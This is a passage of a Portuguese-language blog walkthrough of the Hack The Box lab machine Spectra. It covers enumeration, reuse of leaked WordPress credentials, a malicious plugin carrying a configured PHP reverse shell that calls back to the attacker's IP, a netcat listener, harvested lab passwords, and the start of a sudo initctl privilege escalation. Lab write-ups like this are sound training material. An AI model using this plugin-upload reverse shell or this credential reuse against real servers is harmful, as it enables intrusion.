<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.24.0 by Michael Rose
  Copyright 2013-2020 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <!-- start custom head snippets -->
<!-- Begin Jekyll GTM tag v1.0.3 -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-MF4PLJ5');</script>
<!-- End Jekyll GTM tag v1.0.3 -->


<!-- insert favicons. use https://realfavicongenerator.net/ -->
<link rel="shortcut icon" href="/assets/images/favicon.ico" />

<!-- Multilang tags -->

    
<link rel="alternate" hreflang="pt-BR" href="https://davicruz.com/walkthrough/2021/06/htb-spectra">
<link rel="alternate" hreflang="x-default" href="https://davicruz.com/walkthrough/2021/06/htb-spectra">
    

    
<link rel="alternate" hreflang="en-US" href="https://davicruz.com/en-US/walkthrough/2021/06/htb-spectra">
        
<link rel="alternate" hreflang="en" href="https://davicruz.com/en-US/walkthrough/2021/06/htb-spectra">
        
    


<!-- end custom head snippets -->

    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Walktrough: HTB Spectra | Davi Cruz</title>
<meta name="description" content="Olá pessoal!  A máquina desta semana será Spectra, outra máquina Linux classificada como fácil do Hack The Box, criada por egre55.">


  <meta name="author" content="Davi Cruz">
  
  <meta property="article:author" content="Davi Cruz">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Davi Cruz">
<meta property="og:title" content="Walktrough: HTB Spectra">
<meta property="og:url" content="https://davicruz.com/walkthrough/2021/06/htb-spectra">


  <meta property="og:description" content="Olá pessoal!  A máquina desta semana será Spectra, outra máquina Linux classificada como fácil do Hack The Box, criada por egre55.">



  <meta property="og:image" content="https://i.imgur.com/KjpVjtL.png">



  <meta name="twitter:site" content="@zerahzurc">
  <meta name="twitter:title" content="Walktrough: HTB Spectra">
  <meta name="twitter:description" content="Olá pessoal!  A máquina desta semana será Spectra, outra máquina Linux classificada como fácil do Hack The Box, criada por egre55.">
  <meta name="twitter:url" content="https://davicruz.com/walkthrough/2021/06/htb-spectra">

  
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content="https://i.imgur.com/KjpVjtL.png">
  

  



  <meta property="article:published_time" content="2021-06-26T13:00:00-03:00">





  

  


<link rel="canonical" href="https://davicruz.com/walkthrough/2021/06/htb-spectra">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": "Davi Cruz",
      "url": "https://davicruz.com/",
      "sameAs": ["https://twitter.com/zerahzurc","https://www.linkedin.com/in/davicruz","https://github.com/davi-cruz"]
    
  }
</script>


  <meta name="google-site-verification" content="hrWV-PqvbpxEy2HdpVYFQNws2Sz_tROleVyF18s2kWA" />


  <meta name="msvalidate.01" content="60B1FA6CDAF15D226AB529AF30386BD8">



  <meta name="yandex-verification" content="08de8d8c0326420f">



<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Davi Cruz Feed">


<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css"></noscript>



  </head>

  <body class="layout--single wide">
    <!-- Begin Jekyll GTM tag v1.0.3 (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MF4PLJ5" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Jekyll GTM tag v1.0.3 (noscript) -->

    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Pular para navegação primária</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Pular para conteúdo</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Pular para rodapé</a></li>
  </ul>
</nav>

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        <!-- CUSTOM: Edit to adjust links to localized page -->
        
        
          <a class="site-logo" href="/"><img src="/assets/images/logo.png" alt="Davi Cruz"></a>
        
        <a class="site-title" href="/">
          Davi Cruz
          
        </a>
        
        <!-- END CUSTOM: Edit to adjust links to localized page -->
        <ul class="visible-links">
          <!-- CUSTOM: Edit to get localized navigation --><li class="masthead__menu-item">
              <a href="/categorias/">Categorias</a>
            </li>
<li class="masthead__menu-item">
              <a href="/tags/">Tags</a>
            </li>
<li class="masthead__menu-item">
              <a href="/sobre/">Sobre</a>
            </li>
<!-- END CUSTOM: Edit to get localized navigation -->
        </ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Chavear busca</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Chavear menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      





<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person" class="h-card">

  
    <div class="author__avatar">
      <a href="https://davicruz.com/">
        <img src="/assets/images/bio-photo.jpg" alt="Davi Cruz" itemprop="image" class="u-photo">
      </a>
    </div>
  

  <div class="author__content">
    <h3 class="author__name p-name" itemprop="name">
      <a class="u-url" rel="me" href="https://davicruz.com/" itemprop="url">Davi Cruz</a>
    </h3>
    
      <div class="author__bio p-note" itemprop="description">
        <p>Just another Cybersecurity professional</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Siga</button>
    <ul class="author__urls social-icons">
      
        <li itemprop="homeLocation" itemscope itemtype="https://schema.org/Place">
          <i class="fas fa-fw fa-map-marker-alt" aria-hidden="true"></i> <span itemprop="name" class="p-locality">São Paulo, BR</span>
        </li>
      

      
        
          
            <li><a href="https://linkedin.com/in/davicruz" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fab fa-linkedin" aria-hidden="true"></i><span class="label">Linkedin</span></a></li>
          
        
          
            <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i><span class="label">Twitter</span></a></li>
          
        
          
            <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer me">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page h-entry" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Walktrough: HTB Spectra">
    <meta itemprop="description" content="Olá pessoal!A máquina desta semana será Spectra, outra máquina Linux classificada como fácil do Hack The Box, criada por egre55.">
    <meta itemprop="datePublished" content="2021-06-26T13:00:00-03:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title p-name" itemprop="headline">
            <a href="https://davicruz.com/walkthrough/2021/06/htb-spectra" class="u-url" itemprop="url">Walktrough: HTB Spectra
</a>
          </h1>
          

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-06-26T13:00:00-03:00">June 26, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          9 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/06/htb-spectra">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


        </header>
      

      <section class="page__content e-content" itemprop="text">
        
        <p>Olá pessoal!</p>

<p>A máquina desta semana será <strong>Spectra</strong>, outra máquina Linux classificada como fácil do <a href="https://www.hackthebox.eu">Hack The Box</a>, criada por <a href="https://app.hackthebox.eu/users/1190">egre55</a>.<!--more--></p>

<p class="notice--info"><img class="emoji" title=":information_source:" alt=":information_source:" src="https://github.githubassets.com/images/icons/emoji/unicode/2139.png" height="20" width="20"> <strong>Info</strong>: Write-ups para máquinas do Hack The Box são postados assim que as respectivas máquinas são aposentadas</p>

<p><img src="https://i.imgur.com/OqO1ZZh.png" alt="HTB Spectra" class="align-center"></p>

<h2 id="enumeração">Enumeração</h2>

<p>Como de costume, iniciamos sempre com um scan rápido utilizando o <code class="language-plaintext highlighter-rouge">nmap</code> a fim de identificar os serviços publicados nesta máquina.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ target</span><span class="o">=</span>10.10.10.229<span class="p">;</span> nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-Pn</span> <span class="nt">-oA</span> quick <span class="nv">$target</span>
Host discovery disabled <span class="o">(</span><span class="nt">-Pn</span><span class="o">)</span><span class="nb">.</span> All addresses will be marked <span class="s1">'up'</span> and scan <span class="nb">times </span>will be slower.
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-03-12 12:57 EST
Nmap scan report <span class="k">for </span>10.10.10.229
Host is up <span class="o">(</span>0.079s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.1 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|_  4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a <span class="o">(</span>RSA<span class="o">)</span>
80/tcp   open  http    nginx 1.17.4
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn<span class="s1">'t have a title (text/html).
3306/tcp open  mysql   MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.73 seconds
</span></code></pre></div></div>

<h3 id="80tcp---serviço-http">80/TCP - Serviço HTTP</h3>

<p>Ao acessar o serviço publicado na porta 80 TCP, vemos uma página HTML muito simples com uma mensagem e dois links.</p>

<p>Ao inspecionar o código fonte desta página, vemos que estes fazem referência para o dns <code class="language-plaintext highlighter-rouge">spectra.htb</code>, o qual foi incluído no arquivo hosts local para resolução correta deste nome.</p>

<p><img src="https://i.imgur.com/ady30IK.png" alt="Spectra HTB - Issue Tracking page" class="align-center"></p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;h1&gt;</span>Issue Tracking<span class="nt">&lt;/h1&gt;</span>

<span class="nt">&lt;h2&gt;</span>Until IT set up the Jira we can configure and use this for issue tracking.<span class="nt">&lt;/h2&gt;</span>

<span class="nt">&lt;h2&gt;&lt;a</span> <span class="na">href=</span><span class="s">"http://spectra.htb/main/index.php"</span> <span class="na">target=</span><span class="s">"mine"</span><span class="nt">&gt;</span>Software Issue Tracker<span class="nt">&lt;/a&gt;&lt;/h2&gt;</span>
<span class="nt">&lt;h2&gt;&lt;a</span> <span class="na">href=</span><span class="s">"http://spectra.htb/testing/index.php"</span> <span class="na">target=</span><span class="s">"mine"</span><span class="nt">&gt;</span>Test<span class="nt">&lt;/a&gt;&lt;/h2&gt;</span>
</code></pre></div></div>

<p>Ao acessar ambos os links, notado que se trata de sites em WordPress, porém apenas o primeiro (<em>Software Issue Tracker</em>) estava funcionando corretamente, enquanto o segundo (<em>Test</em>), apresentava um erro de conexão com o banco de dados.</p>

<p><img src="https://i.imgur.com/QRXqNtu.png" alt="HTB Spectra - Software Issue Tracker" class="align-center"></p>

<p><img src="https://i.imgur.com/lqTri7v.png" alt="HTB Spectra - Testing" class="align-center"></p>

<h4 id="wpscan">WPScan</h4>

<p>Para obter mais informações sobre ambos os sites WordPress identificados, executado o WPScan neles utilizando os seguintes parâmetros, embora tenha funcionado apenas para o site principal, uma vez que o segundo não estava em pleno funcionamento.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wpscan <span class="nt">--url</span> &lt;url&gt; <span class="nt">-e</span> vp,vt,tt,cb,dbe,u,m <span class="nt">--plugins-detection</span> aggressive <span class="nt">--plugins-version-detection</span> aggressive <span class="nt">-f</span> cli-no-color 2&gt;&amp;1 | <span class="nb">tee</span> <span class="s2">"./wpscan_&lt;url&gt;.txt"</span>
</code></pre></div></div>

<p>Os seguintes pontos foram identificados para o site <code class="language-plaintext highlighter-rouge">main</code> (<em>Software Issue Tracking</em>):</p>

<ul>
  <li>Versão do WordPress: 5.4.2</li>
  <li>Usuários: administrator</li>
</ul>

<p>Dando continuidade com a enumeração de forma manual, notei que para o site <em>Testing</em>, não há um redirect para o <code class="language-plaintext highlighter-rouge">index.php</code> por padrão, listando assim o conteúdo da instalação do WordPress, onde podemos identificar um arquivo interessante: <strong><code class="language-plaintext highlighter-rouge">wp-config.php.save</code></strong>.</p>

<p><img src="https://i.imgur.com/0pPowA4.png" alt="image-20210515144447118" class="align-center"></p>

<p>Como este arquivo não está com a extensão <code class="language-plaintext highlighter-rouge">*.php</code>, ele não será interpretado pelo servidor assim como os demais e poderemos realizar o seu download, conforme executado via linha de comando abaixo.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget http://spectra.htb/testing/wp-config.php.save
</code></pre></div></div>

<p>Inspecionando seu conteúdo, podemos ver as seguintes credenciais para o usuário de banco de dados:</p>

<blockquote>
  <p>Username: devtest</p>

  <p>Password: devteam01</p>
</blockquote>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// ** MySQL settings - You can get this info from your web host ** //</span>
<span class="cd">/** The name of the database for WordPress */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_NAME'</span><span class="p">,</span> <span class="s1">'dev'</span> <span class="p">);</span>

<span class="mf">...</span><span class="n">skipping</span> <span class="mi">1</span> <span class="n">line</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_USER'</span><span class="p">,</span> <span class="s1">'devtest'</span> <span class="p">);</span>

<span class="cd">/** MySQL database password */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_PASSWORD'</span><span class="p">,</span> <span class="s1">'devteam01'</span> <span class="p">);</span>

<span class="cd">/** MySQL hostname */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_HOST'</span><span class="p">,</span> <span class="s1">'localhost'</span> <span class="p">);</span>

<span class="cd">/** Database Charset to use in creating database tables. */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_CHARSET'</span><span class="p">,</span> <span class="s1">'utf8'</span> <span class="p">);</span>

<span class="cd">/** The Database Collate type. Don't change this if in doubt. */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_COLLATE'</span><span class="p">,</span> <span class="s1">''</span> <span class="p">);</span>
</code></pre></div></div>

<p>Como na enumeração do <code class="language-plaintext highlighter-rouge">nmap</code> havia sido listado uma instancia de MySQL, mas que não tínhamos acesso de forma não autenticada, agora podemos testar estas credenciais a partir de linha de comando, porém meu endereço IP não está autorizado a se conectar na instância, nos impedindo assim de validar as credenciais</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>mysql <span class="nt">-u</span> devtest <span class="nt">-p</span> <span class="nt">-h</span> spectra.htb
Enter password:
ERROR 1130 <span class="o">(</span>HY000<span class="o">)</span>: Host <span class="s1">'10.10.10.10'</span> is not allowed to connect to this MySQL server
</code></pre></div></div>

<p>Uma vez que o reuso de credenciais é algo bastante comum, tentei me autenticar no portal do Wordpress com a senha encontrada e o usuário previamente enumerado e tive o sucesso esperado!</p>

<p><img src="https://i.imgur.com/7k3nxVN.png" alt="HTB Spectra - Wordpress" class="align-center"></p>

<h2 id="aceso-inicial">Aceso inicial</h2>

<p>Uma vez que temos acesso ao WordPress com privilégios administrativos, existem diversas maneiras de obter um shell reverso a partir destas permissões, sendo a forma mais comum o upload de um plugin malicioso que retornará um shell reverso para a máquina atacante.</p>

<p>Para esta finalidade existe um módulo do Metasploit Framework chamado <a href="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/webapp/wp_admin_shell_upload.md">wp_admin_shell_upload</a>, que automatiza este processo de forma bem eficiente, porém, se estiver se preparando para a OSCP, que te limita a quantidade de vezes que pode utilizar o framework, para esta atividade simples isso não seria uma boa ideia <img class="emoji" title=":smile:" alt=":smile:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f604.png" height="20" width="20">.</p>

<p>Então, para criar este plugin, precisamos realizar os seguintes passos:</p>

<ul>
  <li>Criar um arquivo com o header do plugin. Este header tem que obedecer aos requisitos mínimos conforme documentado em <a href="https://developer.wordpress.org/plugins/plugin-basics/header-requirements/">Header Requirements | Plugin Developer Handbook | WordPress Developer Resources</a>. No nosso caso criei o arquivo <code class="language-plaintext highlighter-rouge">evilplugin.php</code> com o conteúdo listado abaixo.</li>
</ul>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cd">/**
 * Plugin Name: evilplugin
  * Version: 1.0
  * Author: evilauthor
  * Author URI: http://evilplugin.test.com
  * License: GPL2
  */</span>
</code></pre></div></div>

<ul>
  <li>Criar outro arquivo com o payload desejado. Neste caso como o objetivo é um shell reverso, fiz uma cópia do <a href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php">php reverse shell do Pentest Monkey</a>, alterei os detalhes deste e salvei como <code class="language-plaintext highlighter-rouge">exploit.php</code>. Abaixo evidencio o trecho do script que necessita alteração.</li>
</ul>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Usage</span>
<span class="c1">// -----</span>
<span class="c1">// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.</span>
<span class="nb">set_time_limit</span> <span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="nv">$VERSION</span> <span class="o">=</span> <span class="s2">"1.0"</span><span class="p">;</span>
<span class="nv">$ip</span> <span class="o">=</span> <span class="s1">'10.10.10.10'</span><span class="p">;</span>  <span class="c1">// CHANGE THIS</span>
<span class="nv">$port</span> <span class="o">=</span> <span class="mi">4443</span><span class="p">;</span>       <span class="c1">// CHANGE THIS</span>
<span class="nv">$chunk_size</span> <span class="o">=</span> <span class="mi">1400</span><span class="p">;</span>
<span class="nv">$write_a</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nv">$error_a</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nv">$shell</span> <span class="o">=</span> <span class="s1">'uname -a; w; id; /bin/sh -i'</span><span class="p">;</span>
<span class="nv">$daemon</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="nv">$debug</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div></div>

<ul>
  <li>Compactar arquivo conforme abaixo</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>zip evilplugin.zip evilplugin.php exploit.php
  adding: evilplugin.php <span class="o">(</span>deflated 9%<span class="o">)</span>
  adding: exploit.php <span class="o">(</span>deflated 59%<span class="o">)</span>
</code></pre></div></div>

<ul>
  <li>Uma vez criado o arquivo, acessar o portal do WordPress, autenticar com a conta administrativa e acessar, ao lado esquerdo, o menu <em>Plugins</em> &gt; <em>Add New</em> e, no topo, clicar no botão <em>Upload Plugin</em>
</li>
</ul>

<p><img src="https://i.imgur.com/UlBkZNE.png" alt="HTB Spectra - Upload evilplugin.zip" class="align-center"></p>

<ul>
  <li>Inicializar o listener de acordo com o payload configurado. No nosso caso vamos iniciar o  netcat conforme linha de comando abaixo</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc <span class="nt">-lnvp</span> 4443
</code></pre></div></div>

<ul>
  <li>Selecionar o arquivo zip recém-criado e clicar no botão <em>Install Now</em>
</li>
</ul>

<p><img src="https://i.imgur.com/sNlvuWi.png" alt="HTB Spectra - Installed evilplugin.zip" class="align-center"></p>

<ul>
  <li>Assim que o request for finalizado é importante fazer a requisição para o caminho dos arquivos em que o upload foi realizado. A linha de comando abaixo realiza o request usando <code class="language-plaintext highlighter-rouge">curl</code>, mas você pode deixar uma aba do browser preparada para realizar um GET nesta mesma URL</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-L</span> http://spectra.htb/main/wp-content/plugins/evilplugin/exploit.php
</code></pre></div></div>

<p>Após este procedimento, deveremos receber um shell reverso na máquina conforme abaixo: <img class="emoji" title=":smiley:" alt=":smiley:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f603.png" height="20" width="20"></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nc <span class="nt">-lnvp</span> 4443
listening on <span class="o">[</span>any] 4443 ...
connect to <span class="o">[</span>10.10.10.10] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.229] 43298
Linux spectra 5.4.66+ <span class="c">#1 SMP Tue Dec 22 13:39:49 UTC 2020 x86_64 AMD EPYC 7401P 24-Core Processor AuthenticAMD GNU/Linux</span>
 08:41:48 up 4 min,  0 <span class="nb">users</span>,  load average: 0.26, 0.31, 0.17
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
<span class="nv">uid</span><span class="o">=</span>20155<span class="o">(</span>nginx<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>20156<span class="o">(</span>nginx<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>20156<span class="o">(</span>nginx<span class="o">)</span>
nginx@spectra / <span class="nv">$ </span><span class="nb">id
id
</span><span class="nv">uid</span><span class="o">=</span>20155<span class="o">(</span>nginx<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>20156<span class="o">(</span>nginx<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>20156<span class="o">(</span>nginx<span class="o">)</span>
nginx@spectra / <span class="err">$</span>
</code></pre></div></div>

<p class="notice--info"><img class="emoji" title=":bulb:" alt=":bulb:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f4a1.png" height="20" width="20"> <strong>Dica:</strong> Existem maneiras mais simples de alcançar este mesmo objetivo e ainda assim não utilizar o Metasploit. Uma ferramenta disponível no Github que pode auxiliar nesta tarefa é o <a href="https://github.com/n00py/WPForce">n00py/WPForce: Wordpress Attack Suite (github.com)</a>, que automatiza este e outros processos para exploração de websites em WordPress</p>

<h2 id="user-flag">User flag</h2>

<p>Após acesso inicial na máquina, iniciada enumeração utilizando o script <code class="language-plaintext highlighter-rouge">linpeas.sh</code>, onde pude revisar diversas informações, conforme listado abaixo:</p>

<ul>
  <li>
    <p>User: <strong>nginx</strong>, sem privilégios específicos (<code class="language-plaintext highlighter-rouge">uid=20155(nginx) gid=20156(nginx) groups=20156(nginx)</code>)</p>
  </li>
  <li>
    <p>Sistema Operacional: <strong>Chromium OS 11</strong>.0_pre399094_p20200824-r6</p>
  </li>
  <li>
    <p>Publicação do conteúdo do nginx a partir do diretório <code class="language-plaintext highlighter-rouge">/usr/local/share/nginx/html</code> vide caminho dos arquivos <code class="language-plaintext highlighter-rouge">wp-config.php</code> onde as credenciais abaixo foram listadas:</p>

    <table>
      <thead>
        <tr>
          <th>site</th>
          <th>Username</th>
          <th>Password</th>
        </tr>
      </thead>
      <tbody>
        <tr>
          <td>main</td>
          <td>dev</td>
          <td>development01</td>
        </tr>
        <tr>
          <td>testing</td>
          <td>devtest</td>
          <td>devteam01</td>
        </tr>
      </tbody>
    </table>
  </li>
  <li>
    <p>Users com console, sendo possíveis caminhos de elevação de privilégio, assim como seus privilégios:</p>
  </li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[+] Users with console
chronos:x:1000:1000:system_user:/home/chronos/user:/bin/bash
katie:x:20156:20157::/home/katie:/bin/bash
root:x:0:0:root:/root:/bin/bash

uid=20156(katie) gid=20157(katie) groups=20157(katie),20158(developers)
uid=1001(chronos-access) gid=1001(chronos-access) groups=1001(chronos-access)
</code></pre></div></div>

<ul>
  <li>
    <p>MySQL  Ver 14.14 Distrib 5.7.20-19, for Linux (x86_64) using  6.3</p>
  </li>
  <li>
    <p>Possíveis chaves de SSH para máquina</p>
  </li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/share/chromeos-ssh-config/keys/authorized_keys
/usr/share/chromeos-ssh-config/keys/id_rsa
/usr/share/chromeos-ssh-config/keys/id_rsa.pub
</code></pre></div></div>

<ul>
  <li>Arquivos passwd incomuns, sendo um deles para <strong>autologin</strong> e com a senha <strong>SummerHereWeCome!!</strong> presente</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[+] Searching uncommon passwd files (splunk)
passwd file: /etc/autologin/passwd
passwd file: /etc/pam.d/passwd
passwd file: /usr/share/baselayout/passwd

/etc/autologin/passwd
-rw-r--r-- 1 root root 19 Feb  3 16:43 /etc/autologin/passwd
SummerHereWeCome!!
</code></pre></div></div>

<ul>
  <li>Arquivo <code class="language-plaintext highlighter-rouge">user.txt</code> no home path da usuária <strong>katie</strong>, enumerado manualmente no que poderia ser visto no diretório de cada um dos usuários logados</li>
</ul>

<p>Uma vez que encontramos algumas senhas, um usuário inclusive que já tínhamos conhecimento vide enumeração via HTTP, decidi testá-las para os usuários <code class="language-plaintext highlighter-rouge">katie</code> e <code class="language-plaintext highlighter-rouge">chronos</code>, tendo sucesso com a seguinte combinação: <strong>katie:SummerHereWeCome!!</strong></p>

<p>Com acesso neste perfil realizado leitura da flag presente em seu home directory</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>katie@spectra ~ <span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>20156<span class="o">(</span>katie<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>20157<span class="o">(</span>katie<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>20157<span class="o">(</span>katie<span class="o">)</span>,20158<span class="o">(</span>developers<span class="o">)</span>
katie@spectra ~ <span class="nv">$ </span><span class="nb">cat </span>user.txt
e89d27fe195e9114ffa72ba8913a6130
katie@spectra ~ <span class="err">$</span>
</code></pre></div></div>

<h2 id="root-flag">Root flag</h2>

<p>já que temos a senha da usuária katie, a primeira coisa a fazer, já que temos sua senha, é verificar se ela possui algum privilégio de sudo, o qual retornou a seguinte entrada</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>katie@spectra ~ <span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
User katie may run the following commands on spectra:
    <span class="o">(</span>ALL<span class="o">)</span> SETENV: NOPASSWD: /sbin/initctl
katie@spectra ~ <span class="err">$</span>
</code></pre></div></div>

<p>Analisando o binário, o mesmo pode ser utilizado para o controle de jobs na máquina, vide execução do comando abaixo, porém precisaremos acesso para alteração de algum desses jobs de inicialização</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>katie@spectra ~ <span class="nv">$ </span>/sbin/initctl <span class="nb">help
</span>Job commands:
  start                       Start job.
  stop                        Stop job.
  restart                     Restart job.
  reload                      Send HUP signal to job.
  status                      Query status of job.
  list                        List known jobs.

Event commands:
  emit                        Emit an event.

Other commands:
  reload-configuration        Reload the configuration of the init daemon.
  version                     Request the version of the init daemon.
  log-priority                Change the minimum priority of log messages from the init daemon
  show-config                 Show emits, start on and stop on details <span class="k">for </span>job configurations.
  <span class="nb">help                        </span>display list of commands
</code></pre></div></div>

<p>Uma vez que a usuária katie é membro do grupo <strong>developers</strong>, decidi buscar por arquivos que este grupo tenha privilégio com base na execução abaixo, aonde foram retornados alguns arquivos na pasta <code class="language-plaintext highlighter-rouge">/etc/init</code> e que eram listados como jobs pelo <code class="language-plaintext highlighter-rouge">initctl</code>.</p>

